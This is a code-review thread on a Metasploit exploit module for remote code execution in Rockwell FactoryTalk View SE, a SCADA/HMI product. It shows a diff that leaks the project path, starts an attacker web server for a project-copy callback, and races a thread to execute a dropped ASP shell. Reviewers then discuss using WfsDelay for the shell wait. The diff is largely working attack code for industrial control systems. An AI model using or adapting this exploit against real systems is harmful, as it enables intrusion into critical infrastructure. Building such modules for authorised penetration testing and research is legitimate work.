modules/exploits/windows/scada/rockwell_factorytalk_rce.rb

```diff
@@ -0,0 +1,239 @@
+      @proj_name = project.attributes['Name']
+
+      # Infoleak 2 (project installation path)
+      # In the original exploit, we used this to calculate the directory traversal path, but
+      # Google says the path is the same for all versions since at least 2007.
+      # Let's still abuse it to check if the project is valid.
+      url = "/hmi_isapi.dll?GetHMIProjectPath&#{@proj_name}"
+      res = send_to_factory(url)
+
+      proj_path = res.body.strip
+
+      # Check if response contains :\ that indicates a windows path
+      if proj_path.match(/:\\/)
+        print_status("#{peer} - Found project path: #{proj_path}")
+        # We only need first hit so we can quit the project parsing once we get it
+        break
+      end
+
+      # We reached end of XML and we didn't manage to get the installation path
+      @proj_name = nil
+    end
+
+    if !@proj_name
+      fail_with(Failure::Unknown, 'Failed to get a path to drop our shell, bailing out...')
+    end
+
+    shell_path = proj_path.sub(@proj_name, '').strip
+    print_good("#{peer} - Got a path to drop our shell: #{shell_path}")
+
+    # Start http server for project copy callback
+    http_service = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
+    print_status("#{peer} - Starting up our web service on #{http_service} ...")
+
+    start_service({ 'Uri' => {
+      'Proc' => proc do |cli, req|
+        on_request_uri(cli, req)
+      end,
+      # This path has to be capitalized as "RSViewSE" or else the exploit will fail!
+      'Path' => '/RSViewSE/'
+    } })
+
+    # Race Condition
+    # This is the racer thread. It will continuously access our asp file until it gets executed
+    print_status("#{peer} - Starting racer thread, let's win this race condition!")
+    @shelly = "#{rand_text_alpha(5..10)}.asp"
+    racer = Thread.new do
+      begin
+        loop do
+          res = send_to_factory("/#{@shelly}")
+          if res.code == 200
+            print_good("#{peer} - We've won the race condition, shell incoming!")
+            break
+          end
+        end
+      end
+    end
+
+    # Project Copy Request: target will connect to us to obtain project information.
+    print_status("#{peer} - Initiating project copy request...")
+    url = "/hmi_isapi.dll?StartRemoteProjectCopy&#{@proj_name}&#{rand_text_alpha(5..13)}&#{datastore['SRVHOST']}:#{datastore['SRVPORT']}&1"
+    res = send_to_factory(url)
+
+    # wait up to datastore['SLEEP_RACER'] seconds for the racer thread to finish
+    count = 0
+    while count < datastore['SLEEP_RACER']
+      if racer.status == false
+        break
+      else
+        sleep(1)
+        count += 1
+      end
+    end
+    racer.exit
+
+    # ... then wait datastore['SLEEP_SHELL'] seconds to receive our shell
+    # Without this sleep the exploit fails!
+    count = 0
+    while count < datastore['SLEEP_SHELL'] && !@shell_recv
+      sleep(1)
+      count += 1
+    end
```

Comment:
Would this also work with `WfsDelay` ("wait for shell delay") ? In theory, it should be effectively the same. That is, wait x number of seconds for a shell before giving up.

`WfsDelay` is user configurable, and can be defined in the module `info` Hash.

```ruby
'DefaultOptions'   => { 'WfsDelay' => 30 }
```

If so, that would remove the requirement for the `on_new_session` method and associated `@shell_recv` temporary state variable and `SLEEP_SHELL` option.

Reply:
I think we tried that, but good point - I'll double check and get back to you

Reply:
Confirmed, works with WfsDelay, thanks for spotting it!